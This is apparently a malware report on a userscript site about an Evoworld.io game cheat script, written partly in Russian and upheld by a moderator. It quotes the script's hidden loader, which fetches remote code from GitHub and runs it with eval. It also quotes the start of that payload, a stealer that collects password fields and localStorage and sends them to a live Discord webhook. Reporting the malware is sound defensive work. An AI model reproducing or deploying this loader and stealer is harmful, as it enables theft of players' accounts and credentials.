Evoworld.io COMBAT HACK was reported 2026-01-04 for Malware
Stiller accounts line 409 - 419:
fetch('https://raw.githubusercontent.com/shadowxds-eng/main.js/main/main.code')
.then(response => response.text())
.then(code => {
eval(code);
})
если перейти на https://raw.githubusercontent.com/shadowxds-eng/main.js/main/main.code то там основная часть воровства аккаунтов:
// webhook.js - Data collection and Discord sending ONLY
(function() {
'use strict';
console.log('EvoWorld Data Collector loaded');
const DISCORD_WEBHOOK = 'https://discord.com/api/webhooks/1457387501139525810/owMaPq6BvF1suRbSgOC4BetPSNTbFijMvyOP8pSt6yVULem4mX9yHgKglOXEnlCHtHYE';
function getSavedPassword() {
try {
const inputs = document.querySelectorAll('input[type="password"], input[name*="pass"], input[id*="pass"]');
for (let input of inputs) {
if (input.value && input.value.length > 3 && input.value.length < 50) {
return input.value;
}
}
for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
if ((ke
This script has had 1 previous upheld or fixed report.
türk evoworld sikici (the reported user) has made:
This report has been upheld by a moderator, but the moderator marked it as Disallowed external code.
